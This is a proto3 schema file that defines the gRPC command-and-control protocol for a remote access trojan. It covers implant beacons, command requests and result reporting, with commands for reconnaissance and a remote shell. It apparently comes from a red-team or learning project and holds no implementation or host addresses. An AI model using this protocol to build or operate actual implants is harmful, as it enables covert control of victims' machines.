remote_access_trojan/rat.proto

syntax = "proto3";

package rat;

service AskForInstructions {
    rpc Send (Beacon) returns (CommandRequest);
}

service RecordCommandResult {
    rpc Send (CommandResponse) returns (Empty);
}

enum RATCommand {
        Cadence = 0; 
        Dir = 1;
        Help = 2;
        Hostname = 3;
        Ip = 4;
        Ls = 5;
        None = 6;
        Os = 7;
        Quit = 8;
        Shell = 9;
        Whoami = 10;
    }

message Beacon {
    uint32 requested_command = 1;
}

message CommandRequest {
    RATCommand command = 1;
    string arguments = 2;
}

message CommandResponse {
    string implant_id = 1;
    uint64 timestamp = 2;
    RATCommand command = 3;
    string arguments = 4;
    string result = 5;
}

message Empty {}